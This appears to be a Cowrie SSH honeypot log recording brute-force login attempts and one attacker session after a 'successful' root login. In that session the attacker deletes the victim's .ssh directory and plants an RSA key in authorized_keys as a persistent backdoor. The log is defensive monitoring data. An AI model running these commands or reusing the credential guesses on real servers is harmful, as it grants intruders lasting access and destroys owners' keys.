{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:01:32.626989Z","src_ip":"212.227.235.229","session":"ab43858387a1"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:01:32.794011Z","src_ip":"212.227.235.229","session":"ab43858387a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:01:33.515980Z","src_ip":"212.227.235.229","session":"ab43858387a1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:33.694584Z","src_ip":"212.227.235.229","session":"ab43858387a1"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:33.706174Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":59490,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd5bd49b77c2","protocol":"ssh","message":"New connection: 92.118.39.62:59490 (1.2.3.4:22) [session: dd5bd49b77c2]","sensor":"my-vps","timestamp":"2025-09-09T06:01:39.855087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:01:39.855755Z","src_ip":"92.118.39.62","session":"dd5bd49b77c2"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:01:39.886825Z","src_ip":"92.118.39.62","session":"dd5bd49b77c2"}
{"eventid":"cowrie.login.failed","username":"bin","password":"123456","message":"login attempt [bin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:39.981427Z","src_ip":"92.118.39.62","session":"dd5bd49b77c2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:41.014955Z","src_ip":"92.118.39.62","session":"dd5bd49b77c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49188,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a7b18956541","protocol":"ssh","message":"New connection: 212.227.235.229:49188 (1.2.3.4:22) [session: 3a7b18956541]","sensor":"my-vps","timestamp":"2025-09-09T06:01:54.763895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:54.764963Z","src_ip":"212.227.235.229","session":"3a7b18956541"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:54.843255Z","src_ip":"212.227.235.229","session":"3a7b18956541"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:55.200269Z","src_ip":"212.227.235.229","session":"3a7b18956541"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:56.281359Z","src_ip":"212.227.235.229","session":"3a7b18956541"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64634,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5f4245e3140","protocol":"ssh","message":"New connection: 212.227.235.229:64634 (1.2.3.4:22) [session: a5f4245e3140]","sensor":"my-vps","timestamp":"2025-09-09T06:01:59.131494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:59.132518Z","src_ip":"212.227.235.229","session":"a5f4245e3140"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:59.262346Z","src_ip":"212.227.235.229","session":"a5f4245e3140"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:59.839796Z","src_ip":"212.227.235.229","session":"a5f4245e3140"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:00.963959Z","src_ip":"212.227.235.229","session":"a5f4245e3140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43780,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a559df8dd6f","protocol":"ssh","message":"New connection: 212.227.235.229:43780 (1.2.3.4:22) [session: 7a559df8dd6f]","sensor":"my-vps","timestamp":"2025-09-09T06:02:03.495795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:02:03.496804Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:02:03.867738Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:02:05.285154Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:02:05.694347Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:02:05.695123Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:02:05.696284Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:05.865680Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:02:06.219241Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.220078Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36840,"dst_ip":"1.2.3.4","dst_port":22,"session":"76137ed365b4","protocol":"ssh","message":"New connection: 212.227.235.229:36840 (1.2.3.4:22) [session: 76137ed365b4]","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.235052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.235683Z","src_ip":"212.227.235.229","session":"76137ed365b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.390248Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.391341Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.478547Z","src_ip":"212.227.235.229","session":"76137ed365b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45416,"dst_ip":"1.2.3.4","dst_port":22,"session":"256a90e3da25","protocol":"ssh","message":"New connection: 212.227.235.229:45416 (1.2.3.4:22) [session: 256a90e3da25]","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.569855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.570687Z","src_ip":"212.227.235.229","session":"256a90e3da25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:02:06.746426Z","src_ip":"212.227.235.229","session":"256a90e3da25"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:02:07.488063Z","src_ip":"212.227.235.229","session":"256a90e3da25"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex@2025","message":"login attempt [alex/alex@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:02:07.489122Z","src_ip":"212.227.235.229","session":"76137ed365b4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:08.666278Z","src_ip":"212.227.235.229","session":"256a90e3da25"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:08.733234Z","src_ip":"212.227.235.229","session":"76137ed365b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46402,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a65a4a7c43d","protocol":"ssh","message":"New connection: 212.227.235.229:46402 (1.2.3.4:22) [session: 3a65a4a7c43d]","sensor":"my-vps","timestamp":"2025-09-09T06:02:08.834410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:02:08.835403Z","src_ip":"212.227.235.229","session":"3a65a4a7c43d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:02:09.005188Z","src_ip":"212.227.235.229","session":"3a65a4a7c43d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:02:09.722954Z","src_ip":"212.227.235.229","session":"3a65a4a7c43d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:09.891630Z","src_ip":"212.227.235.229","session":"7a559df8dd6f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:09.893736Z","src_ip":"212.227.235.229","session":"3a65a4a7c43d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34055,"dst_ip":"1.2.3.4","dst_port":22,"session":"2146eea25f86","protocol":"ssh","message":"New connection: 212.227.235.229:34055 (1.2.3.4:22) [session: 2146eea25f86]","sensor":"my-vps","timestamp":"2025-09-09T06:02:18.887189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:02:18.888294Z","src_ip":"212.227.235.229","session":"2146eea25f86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:02:18.973952Z","src_ip":"212.227.235.229","session":"2146eea25f86"}
{"eventid":"cowrie.login.failed","username":"admin","password":"asdfghjkl","message":"login attempt [admin/asdfghjkl] failed","sensor":"my-vps","timestamp":"2025-09-09T06:02:19.354407Z","src_ip":"212.227.235.229","session":"2146eea25f86"}
